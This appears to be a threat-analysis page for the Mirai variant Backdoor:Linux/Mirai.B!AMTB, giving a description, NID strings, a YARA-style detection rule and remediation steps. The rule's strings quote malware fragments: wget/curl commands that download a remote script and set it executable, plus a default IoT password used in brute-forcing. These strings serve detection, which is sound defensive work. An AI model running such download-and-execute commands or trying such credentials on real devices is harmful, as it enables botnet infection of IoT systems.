Backdoor:Linux/Mirai.B!AMTB - Windows Defender Threat Analysis

This threat is a concrete detection of Backdoor:Linux/Mirai.B!AMTB, a variant of the Mirai botnet designed to infect Linux-based systems, often targeting IoT devices. It establishes a backdoor, maintains persistence through lock files, and is programmed to download and execute additional malicious scripts from command-and-control (C2) servers. The botnet is known for credential brute-forcing and launching Distributed Denial of Service (DDoS) attacks.

Relevant strings associated with this threat:
 - |#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - }#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - |#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
 - }#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
 - &|#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
 - &}#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
 - y*|#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
 - y*}#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
 - C|#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
 - C}#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
 - L|#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
 - L}#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
 - |#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
 - }#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
 - |#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
 - }#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
 - |#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
 - }#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
 - |#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)
 - }#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)

rule Backdoor_Linux_Mirai_B_2147956509_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "Backdoor:Linux/Mirai.B!AMTB"
        threat_id = "2147956509"
        type = "Backdoor"
        platform = "Linux: Linux platform"
        family = "Mirai"
        severity = "Critical"
        info = "AMTB: an internal category used to refer to some threats"
        signature_type = "SIGNATURE_TYPE_ELFHSTR_EXT"
        threshold = "5"
        strings_accuracy = "High"
    strings:
        $x_1_1 = "xmhdipc" ascii //weight: 1
        $x_1_2 = "/tmp/.bot_lock" ascii //weight: 1
        $x_1_3 = "cd /root wget http://%s/cat.sh" ascii //weight: 1
        $x_1_4 = "wget http://%s/run.sh; curl -O http://%s/run.sh; chmod 777 run.sh" ascii //weight: 1
        $x_1_5 = "7ujMko0admin" ascii //weight: 1
        $x_1_6 = "udpplain" ascii //weight: 1
    condition:
        (filesize < 20MB) and
        (5 of ($x*))
}

Immediately isolate the compromised Linux system from the network. Conduct a thorough scan with an updated EDR/antivirus solution to fully remove the Mirai binary and any associated persistence mechanisms. Change all compromised or default credentials, apply all available security patches to the operating system and applications, and implement network segmentation with egress filtering to prevent C2 communication.